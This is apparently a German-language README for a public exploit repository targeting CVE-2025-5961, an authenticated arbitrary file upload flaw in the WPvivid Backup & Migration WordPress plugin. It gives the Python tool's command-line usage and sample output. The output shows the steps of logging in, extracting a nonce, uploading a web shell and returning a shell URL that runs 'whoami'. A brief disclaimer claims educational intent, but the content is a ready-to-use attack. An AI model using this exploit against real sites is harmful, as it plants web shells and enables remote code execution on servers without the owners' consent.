
Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authentifiziert (Administrator+) Beliebiger Datei-Upload
📈 Diese Sicherheitslücke betrifft ein Plugin mit über 700.000+ Installationen
Das Migration, Backup, Staging – WPvivid Backup & Migration-Plugin für WordPress ist anfällig für beliebige Datei-Uploads aufgrund fehlender Dateityp-Validierung in der wpvivid_upload_import_files-Funktion in allen Versionen bis einschließlich 0.9.116.
Dies ermöglicht authentifizierten Angreifern (Administrator-Ebene und höher) das Hochladen beliebiger Dateien auf den Server, was potenziell die Ausführung von Remote-Code ermöglicht.
Dieses Repository enthält ein Exploit-Skript für CVE-2025-5961, geschrieben in Python, welches:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
Dieses Skript wird ausschließlich zu Lehr- und Forschungszwecken bereitgestellt.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Khaled Alenazi (Nxploited)
🌐 GitHub